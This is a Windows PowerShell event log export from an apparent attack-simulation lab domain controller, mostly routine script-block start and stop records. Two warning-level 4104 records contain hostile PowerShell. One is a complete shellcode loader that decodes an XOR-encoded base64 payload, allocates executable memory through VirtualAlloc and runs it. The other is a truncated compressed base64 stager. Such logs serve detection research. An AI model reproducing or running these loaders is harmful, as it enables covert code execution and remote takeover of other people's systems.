SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479218
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479217
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479216
Keywords=None
Message=Completed invocation of ScriptBlock ID: 8b6d6aa4-57ee-4061-8314-82885b07f2c4
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479215
Keywords=None
Message=Completed invocation of ScriptBlock ID: 28b0d021-de54-4ece-9f97-e05084174e2f
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479214
Keywords=None
Message=Started invocation of ScriptBlock ID: 28b0d021-de54-4ece-9f97-e05084174e2f
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479213
Keywords=None
Message=Completed invocation of ScriptBlock ID: 6acf7ef5-6f9c-406b-a073-9c2ad6e0edec
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479212
Keywords=None
Message=Started invocation of ScriptBlock ID: 6acf7ef5-6f9c-406b-a073-9c2ad6e0edec
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479211
Keywords=None
Message=Completed invocation of ScriptBlock ID: ab08d06b-e77b-4ba9-b07f-36e40d1b53cd
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479210
Keywords=None
Message=Completed invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479209
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479208
Keywords=None
Message=Started invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479207
Keywords=None
Message=Started invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479206
Keywords=None
Message=Started invocation of ScriptBlock ID: ab08d06b-e77b-4ba9-b07f-36e40d1b53cd
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479205
Keywords=None
Message=Started invocation of ScriptBlock ID: 8b6d6aa4-57ee-4061-8314-82885b07f2c4
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479204
Keywords=None
Message=Completed invocation of ScriptBlock ID: 53781394-c176-41ff-b5ee-289ee22c086b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479203
Keywords=None
Message=Started invocation of ScriptBlock ID: 53781394-c176-41ff-b5ee-289ee22c086b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:44 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479320
Keywords=None
Message=Started invocation of ScriptBlock ID: a85bed97-9bbb-4097-beff-9d8cef80286e
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:44 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479319
Keywords=None
Message=Completed invocation of ScriptBlock ID: 152befe3-d3f9-4869-b840-a40335364d33
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:44 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479318
Keywords=None
Message=Completed invocation of ScriptBlock ID: 96c9fa28-5752-4028-87a6-893baac490be
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:44 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479317
Keywords=None
Message=Started invocation of ScriptBlock ID: 96c9fa28-5752-4028-87a6-893baac490be
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:44 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479316
Keywords=None
Message=Started invocation of ScriptBlock ID: 152befe3-d3f9-4869-b840-a40335364d33
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:44 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1479315
Keywords=None
Message=Creating Scriptblock text (1 of 1):
prompt

ScriptBlock ID: 152befe3-d3f9-4869-b840-a40335364d33
Path:
06/15/2021 05:06:44 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479314
Keywords=None
Message=Completed invocation of ScriptBlock ID: a85bed97-9bbb-4097-beff-9d8cef80286e
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:44 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479313
Keywords=None
Message=Started invocation of ScriptBlock ID: a85bed97-9bbb-4097-beff-9d8cef80286e
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:44 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479312
Keywords=None
Message=Completed invocation of ScriptBlock ID: 3d44403f-50b0-4c59-afc1-c40910078169
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:44 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479311
Keywords=None
Message=Completed invocation of ScriptBlock ID: 96c9fa28-5752-4028-87a6-893baac490be
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:44 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479310
Keywords=None
Message=Started invocation of ScriptBlock ID: 96c9fa28-5752-4028-87a6-893baac490be
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:44 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479309
Keywords=None
Message=Started invocation of ScriptBlock ID: 3d44403f-50b0-4c59-afc1-c40910078169
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:44 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1479308
Keywords=None
Message=Creating Scriptblock text (1 of 1):
prompt

ScriptBlock ID: 3d44403f-50b0-4c59-afc1-c40910078169
Path:
06/15/2021 05:06:44 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479307
Keywords=None
Message=Completed invocation of ScriptBlock ID: a85bed97-9bbb-4097-beff-9d8cef80286e
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:09:40 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479336
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6e03dbc-385c-4027-957c-23132df10223
Runspace ID: df859e17-4b24-400f-9b27-21ca1430cacf
06/15/2021 05:09:40 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479335
Keywords=None
Message=Started invocation of ScriptBlock ID: d6e03dbc-385c-4027-957c-23132df10223
Runspace ID: df859e17-4b24-400f-9b27-21ca1430cacf
06/15/2021 05:09:40 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479334
Keywords=None
Message=Started invocation of ScriptBlock ID: cede7de8-d6cc-4a67-a209-1cbe6c0f4208
Runspace ID: df859e17-4b24-400f-9b27-21ca1430cacf
06/15/2021 05:09:40 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=3
Type=Warning
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1479333
Keywords=None
Message=Creating Scriptblock text (1 of 1):
Set-StrictMode -Version 2

$DoIt = @'
function func_get_proc_address {
	Param ($var_module, $var_procedure)		
	$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
	$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
	return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}

function func_get_delegate_type {
	Param (
		[Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
		[Parameter(Position = 1)] [Type] $var_return_type = [Void]
	)

	$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
	$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
	$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')

	return $var_type_builder.CreateType()
}

[Byte[]]$var_code = [System.Convert]::FromBase64String('38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qHEzqGEfIvOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwuIuQbw1bXIF7bGF4HVsF7qHsHIvBFqC9oqHs/IvCoJ6gi86pnBwd4eEJ6eXLcw3t8eagxyKV+S01GVyNLVEpNSndLb1QFJNz2yyMjIyMS3HR0dHR0Sxl1WoTc9sqHIyMjeBLqcnJJIHJyS5giIyNwc0t0qrzl3PZzyq8jIyN4EvFxSyMR46dxcXFwcXNLyHYNGNz2quWg4HNLoxAjI6rDSSdzSTx1S1ZlvaXc9nwS3HR0SdxwdUsOJTtY3Pam4yyn6SIjIxLcptVXJ6rayCpLiebBftz2quJLZgJ9Etz2Etx0SSRydXNLlHTDKNz2nCMMIyMa5FYke3PKWNzc3BLcyrIiIyPK6iIjI8tM3NzcDHNPFUkjFmwCcwZjYnN4F39zeXsWFwtzfQoUYGAKFF4HZmpgYnEOcHdibWdicWcOYm13anVqcXZwDndmcHcOZWpvZgIHawhrCSMWbAJzBiN2UEZRDmJERk1XGQNuTFlKT09CDBcNEwMLQExOU0JXSkFPRhgDbnBqZgMUDRMYA3RKTUdMVFADbXcDFg0SGAMNbWZ3A2BvcQMRDRMNFhMUERQYAw1tZncDYG9xAxANEw0TFxYTFQ0QEwouKSMWbAJzBmNic3gXf3N5exYXC3N9ChRgYAoUXgdmamBicQ5wd2JtZ2JxZw5ibXdqdWpxdnAOd2Zwdw5lam9mAgdrCGsJIxZsAnMGY2JzeBd/c3l7FhcLc30KFGBgChReB2ZqYGJxDnB3Ym1nYnFnDmJtd2p1anF2cA53ZnB3DmVqb2YCB2sIawkjFmwCcwZjYnN4F39zeXsWFwtzfQoUYGAKFF4HZmpgYnEOcHdibWdicWcOYm13anVqcXZwDndmcHcOZWojS9OWgXXc9kljSyMzIyNLIyNjI3RLe4dwxtz2sJojIyMjIvpycKrEdEsjAyMjcHVLMbWqwdz2puNX5agkIuCm41bGe+DLqt7c3E5GUUBLQk1HSllGDUBCV0lCTkVGUFcNQExOIyMjIyM=')

for ($x = 0; $x -lt $var_code.Count; $x++) {
	$var_code[$x] = $var_code[$x] -bxor 35
}

$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)

$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
$var_runme.Invoke([IntPtr]::Zero)
'@

If ([IntPtr]::size -eq 8) {
	start-job { param($a) IEX $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
}
else {
	IEX $DoIt
}


ScriptBlock ID: cede7de8-d6cc-4a67-a209-1cbe6c0f4208
Path:
06/15/2021 05:09:40 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479332
Keywords=None
Message=Completed invocation of ScriptBlock ID: a21a271a-edc0-4584-83c1-40720a2a15e9
Runspace ID: df859e17-4b24-400f-9b27-21ca1430cacf
06/15/2021 05:09:40 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479331
Keywords=None
Message=Started invocation of ScriptBlock ID: a21a271a-edc0-4584-83c1-40720a2a15e9
Runspace ID: df859e17-4b24-400f-9b27-21ca1430cacf
06/15/2021 05:09:40 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479330
Keywords=None
Message=Completed invocation of ScriptBlock ID: 7422a9d4-702e-468f-9b74-1daa085dab62
Runspace ID: df859e17-4b24-400f-9b27-21ca1430cacf
06/15/2021 05:09:40 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479329
Keywords=None
Message=Started invocation of ScriptBlock ID: 7422a9d4-702e-468f-9b74-1daa085dab62
Runspace ID: df859e17-4b24-400f-9b27-21ca1430cacf
06/15/2021 05:09:40 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479328
Keywords=None
Message=Started invocation of ScriptBlock ID: a896fde2-3b27-4664-b18e-5e775e6e06b6
Runspace ID: df859e17-4b24-400f-9b27-21ca1430cacf
06/15/2021 05:09:40 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=3
Type=Warning
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1479327
Keywords=None
Message=Creating Scriptblock text (1 of 1):
$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("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